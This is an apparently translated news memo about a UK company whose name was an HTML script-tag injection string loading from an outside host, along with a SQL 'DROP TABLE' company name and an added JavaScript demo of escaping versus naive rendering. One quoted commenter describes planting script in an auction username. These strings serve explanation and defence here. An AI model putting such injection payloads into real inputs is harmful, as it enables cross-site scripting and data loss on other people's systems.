November 4, 2024 19:00 Memo
A case in which a software development company that adopted HTML script tags in its company name was forced by the company registry to change its name because it could “lead to database vulnerability” has become a hot topic on the social news site Hacker News.
Company forced to change name that could be used to hack websites | UK news | The Guardian
https://www.theguardian.com/uk-news/2020/nov/06/companies-house-forces-business-name-change-to-prevent-security-risk
UK govt aims to kill off Bobby Tables in Companies House name rules
https://www.thestack.technology/companies-house-names-rules-drop-table/
Company named “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” forced to change it (2020) | Hacker News
https://news.ycombinator.com/item?id=41948666
According to news reported by the British daily newspaper The Guardian in November 2020, the company in question was a development company founded by a British software engineer. The company name was “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” (all symbols were originally half-width characters).
However, a website with insufficient security measures that did not handle this company name properly could recognize the company name as blank, potentially allowing unintended script execution.
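The behaviour described above, as an added example that is not part of the original article: it assumes the name is written into a double-quoted HTML attribute, uses a constructed stand-in name with the placeholder host example.invalid, and all function names are hypothetical. The unescaped form leaves the field blank and a script tag in the page, while the encoded form keeps the whole name as text.

```javascript
// Constructed stand-in shaped like the name in the article; example.invalid
// is a placeholder host, not the one in the real company name.
const SCRIPT_NAME = '"><SCRIPT SRC=HTTPS://EXAMPLE.INVALID></SCRIPT> LTD';
// The 2016 name from the article, written with straight quotes (assumed).
const SQL_NAME = ';DROP TABLE "COMPANIES";-- LTD';

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const DECODE = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };

// Encode the characters that can close a quoted attribute or open a tag.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Weak: the registry value is pasted into markup as if it were trusted HTML.
function renderNaive(name) {
  return `<input name="company" value="${name}">`;
}

// Corrected: the value is encoded for the attribute context it lands in.
function renderEscaped(name) {
  return `<input name="company" value="${escapeHtml(name)}">`;
}

// Simplified model of an HTML parser reading the value attribute: it stops
// at the first double quote, then decodes the entities escapeHtml emits.
function parsedValue(html) {
  const match = /value="([^"]*)"/.exec(html);
  if (!match) return null;
  return match[1].replace(/&(amp|lt|gt|quot|#39);/g, (_, key) => DECODE[key]);
}

// True when the markup contains a literal <script start tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Summarise what a page built each way would show for one name.
function compare(name) {
  return {
    naiveValue: parsedValue(renderNaive(name)),
    naiveHasScript: containsScriptTag(renderNaive(name)),
    escapedValue: parsedValue(renderEscaped(name)),
    escapedHasScript: containsScriptTag(renderEscaped(name)),
  };
}

console.log(compare(SCRIPT_NAME));
console.log(compare(SQL_NAME));
```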
When a company is registered in the UK, the Companies Registry is required to display the exact name provided, subject to existing regulations. The Companies Registry’s naming rules covered imitations and offensive language, but not attempts to falsify data input.
In the UK in 2016, a company was also registered under the company name “;DROP TABLE "COMPANIES";-- LTD”, which is based on a web comic. Founder Sam Pizzi said, “The commands that make up this company’s name contain intentional mistakes. We do not intend to raise any major issues with the company’s name, but rather use the knowledge of security personnel to make fun of it. I was just trying to get it.” Please note that this company name has not been changed and is still in use at the time of article creation.
The founder of “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” said that he chose this company name because he thought it would be a fun and playful name for his consulting business. However, a malicious attacker could use the same technique to launch a more serious attack called “cross-site scripting”.
As a result, the Company Registry ordered the company's name to be removed from its database and changed. The founder of “><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD” accepted this order and changed the name to “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD”. At the same time, the old company name was completely deleted from the database of the Company Registry.
THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD overview – Find and update company information – GOV.UK
After that, in 2022, the British government announced the “Economic Crime and Corporate Transparency Bill” and changed the naming rules of the company registry. Because company names that falsify data input are now also subject to the regulations, similar company names can no longer be registered.
On Hacker News, comments included “What about company names that influence AI prompts?” and “All in all, it makes sense to restrict such names. This solution is more practical unless you are willing to pay to audit all data users worldwide. I’m not sure what you gain by having a code in your company name”. At the same time, similar cases were also introduced, such as “There are also examples of SQL injection being embedded in speed cameras by pasting script code onto license plates.”, “My daughter was born in Hawaii, and her name can be up to 240 characters long on her Hawaiian birth certificate, so I chose her middle name as Periodic Table.” and “I myself have set my auction site username in script code in the past to prevent anyone else from bidding on the auctions I bid on. I won a lot of auctions, but then my account was deleted.”